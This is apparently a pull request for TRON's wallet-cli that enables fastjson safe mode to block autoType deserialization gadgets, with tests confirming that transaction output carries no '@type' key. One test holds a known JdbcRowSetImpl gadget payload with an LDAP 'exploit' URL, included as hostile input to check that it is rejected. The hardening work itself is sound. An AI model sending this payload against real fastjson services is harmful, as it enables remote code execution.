### PR TITLE
security(java): enable fastjson safe mode

### DIFF
--- a/java/src/main/java/org/tron/common/utils/Utils.java
+++ b/java/src/main/java/org/tron/common/utils/Utils.java
@@ -138,7 +138,7 @@ public class Utils {
 
   public static final int MIN_LENGTH = 2;
   public static final int MAX_LENGTH = 14;
-  public static final String VERSION = " v4.9.6";
+  public static final String VERSION = " v4.9.9";
   public static final String TRANSFER_METHOD_ID = "a9059cbb";
 
   private static SecureRandom random = new SecureRandom();

--- a/java/src/main/java/org/tron/walletcli/Client.java
+++ b/java/src/main/java/org/tron/walletcli/Client.java
@@ -38,6 +38,7 @@ import org.tron.walletcli.cli.StandardCliRunner;
 
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
+import com.alibaba.fastjson.parser.ParserConfig;
 import com.beust.jcommander.JCommander;
 import com.beust.jcommander.Parameter;
 import com.google.common.primitives.Longs;
@@ -124,6 +125,14 @@ import org.tron.trident.proto.Response;
 import org.tron.walletserver.WalletApi;
 
 public class Client {
+
+  static {
+    // fastjson 1.x honors the "@type" hint in JSON.parseObject/parseArray even when the target is a
+    // JSONObject, which is the entry point for autoType deserialization gadgets. wallet-cli feeds
+    // remote HTTP/WebSocket payloads (GasFree, multi-sign) into those calls and never relies on
+    // "@type" itself, so safe mode rejects the hint outright and removes the gadget surface.
+    ParserConfig.getGlobalInstance().setSafeMode(true);
+  }
 
   private WalletApiWrapper walletApiWrapper = new WalletApiWrapper();
   private static int retryTime = 3;

--- a/java/src/test/java/org/tron/common/utils/TransactionJsonSafeModeTest.java
+++ b/java/src/test/java/org/tron/common/utils/TransactionJsonSafeModeTest.java
@@ -6,8 +6,12 @@ import com.google.protobuf.ByteString;
 import org.junit.Assert;
 import org.junit.BeforeClass;
 import org.junit.Test;
+import org.tron.api.GrpcAPI.TransactionExtention;
+import org.tron.api.GrpcAPI.TransactionSignWeight;
 import org.tron.protos.Protocol;
 import org.tron.protos.contract.BalanceContract.TransferContract;
+import org.tron.trident.proto.Chain;
+import org.tron.trident.proto.Response;
 import org.tron.walletcli.Client;
 
 /**
@@ -51,6 +55,32 @@ public class TransactionJsonSafeModeTest {
   @Test
   public void printsTransactionStringUnderSafeMode() {
     String text = Utils.printTransaction(transferTransaction());
+
+    Assert.assertNotNull(text);
+    Assert.assertFalse(text.contains("@type"));
+  }
+
+  @Test
+  public void printsTransactionSignWeightUnderSafeMode() {
+    TransactionSignWeight signWeight = TransactionSignWeight.newBuilder()
+        .setTransaction(TransactionExtention.newBuilder()
+            .setTransaction(transferTransaction()))
+        .build();
+
+    String text = Utils.printTransactionSignWeight(signWeight);
+
+    Assert.assertNotNull(text);
+    Assert.assertFalse(text.contains("@type"));
+  }
+
+  @Test
+  public void printsTransactionApprovedListUnderSafeMode() throws Exception {
+    Response.TransactionApprovedList approved = Response.TransactionApprovedList.newBuilder()
+        .setTransaction(Response.TransactionExtention.newBuilder()
+            .setTransaction(Chain.Transaction.parseFrom(transferTransaction().toByteArray())))
+        .build();
+
+    String text = Utils.printTransactionApprovedList(approved);
 
     Assert.assertNotNull(text);
     Assert.assertFalse(text.contains("@type"));

--- a/java/src/test/java/org/tron/common/utils/TransactionJsonSafeModeTest.java
+++ b/java/src/test/java/org/tron/common/utils/TransactionJsonSafeModeTest.java
@@ -1,0 +1,58 @@
+package org.tron.common.utils;
+
+import com.alibaba.fastjson.JSONObject;
+import com.google.protobuf.Any;
+import com.google.protobuf.ByteString;
+import org.junit.Assert;
+import org.junit.BeforeClass;
+import org.junit.Test;
+import org.tron.protos.Protocol;
+import org.tron.protos.contract.BalanceContract.TransferContract;
+import org.tron.walletcli.Client;
+
+/**
+ * Transaction rendering runs protobuf output through JSON.parseObject, and a Transaction carries its
+ * contract in a protobuf Any. Safe mode rejects any payload containing "@type", so this guards that
+ * our JsonFormat never emits that key and transaction display keeps working.
+ */
+public class TransactionJsonSafeModeTest {
+
+  @BeforeClass
+  public static void enableSafeMode() throws Exception {
+    Class.forName(Client.class.getName());
+  }
+
+  private static Protocol.Transaction transferTransaction() {
+    TransferContract transfer = TransferContract.newBuilder()
+        .setOwnerAddress(ByteString.copyFrom(new byte[]{0x41, 0x01, 0x02, 0x03}))
+        .setToAddress(ByteString.copyFrom(new byte[]{0x41, 0x04, 0x05, 0x06}))
+        .setAmount(1_000_000L)
+        .build();
+    Protocol.Transaction.Contract contract = Protocol.Transaction.Contract.newBuilder()
+        .setType(Protocol.Transaction.Contract.ContractType.TransferContract)
+        .setParameter(Any.pack(transfer))
+        .build();
+    return Protocol.Transaction.newBuilder()
+        .setRawData(Protocol.Transaction.raw.newBuilder()
+            .setTimestamp(1_700_000_000_000L)
+            .addContract(contract))
+        .build();
+  }
+
+  @Test
+  public void printsTransactionWithProtobufAnyUnderSafeMode() {
+    JSONObject json = Utils.printTransactionToJSON(transferTransaction(), true);
+
+    Assert.assertNotNull(json);
+    Assert.assertFalse("JsonFormat must not emit an @type key", json.toJSONString().contains("@type"));
+    Assert.assertTrue(json.toJSONString().contains("contract"));
+  }
+
+  @Test
+  public void printsTransactionStringUnderSafeMode() {
+    String text = Utils.printTransaction(transferTransaction());
+
+    Assert.assertNotNull(text);
+    Assert.assertFalse(text.contains("@type"));
+  }
+}

--- a/java/src/test/java/org/tron/walletcli/FastjsonSafeModeTest.java
+++ b/java/src/test/java/org/tron/walletcli/FastjsonSafeModeTest.java
@@ -1,0 +1,43 @@
+package org.tron.walletcli;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.JSONException;
+import com.alibaba.fastjson.JSONObject;
+import com.alibaba.fastjson.parser.ParserConfig;
+import org.junit.Assert;
+import org.junit.BeforeClass;
+import org.junit.Test;
+
+public class FastjsonSafeModeTest {
+
+  @BeforeClass
+  public static void loadClient() throws Exception {
+    // Client's static initializer is what enables safe mode for the shipped binary.
+    Class.forName(Client.class.getName());
+  }
+
+  @Test
+  public void clientEnablesFastjsonSafeMode() {
+    Assert.assertTrue(ParserConfig.getGlobalInstance().isSafeMode());
+  }
+
+  @Test
+  public void safeModeRejectsAutoTypeHint() {
+    String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\","
+        + "\"dataSourceName\":\"ldap://127.0.0.1:1389/exploit\",\"autoCommit\":true}";
+    try {
+      JSON.parseObject(payload);
+      Assert.fail("safe mode must reject the @type autoType hint");
+    } catch (JSONException e) {
+      Assert.assertTrue(e.getMessage(), e.getMessage().contains("safeMode"));
+    }
+  }
+
+  @Test
+  public void safeModeStillParsesOrdinaryPayloads() {
+    JSONObject parsed = JSON.parseObject("{\"address\":\"TXyz\",\"balance\":42}");
+
+    Assert.assertEquals("TXyz", parsed.getString("address"));
+    Assert.assertEquals(42, parsed.getIntValue("balance"));
+  }
+}


### PR DESCRIPTION
fastjson 1.x parses the "@type" hint even when the target is a JSONObject, and filters it with a deny-list of known gadget classes. wallet-cli feeds untrusted remote payloads into JSON.parseObject (GasFreeApi, MultiSignService, MultiTxWebSocketClient) and never relies on "@type" itself, so force safe mode in Client's static initializer to reject the hint outright. Both the REPL and the standard CLI funnel through Client.main / runMain, so one static block covers both.

Defense in depth rather than a patch for a live vulnerability: no published advisory affects 1.2.83. This matches the default fastjson2 ships with.

Transaction rendering was the compatibility risk, since a Transaction carries its contract in a protobuf Any. TRON's own JsonFormat prints type_url rather than "@type", guarded by TransactionJsonSafeModeTest.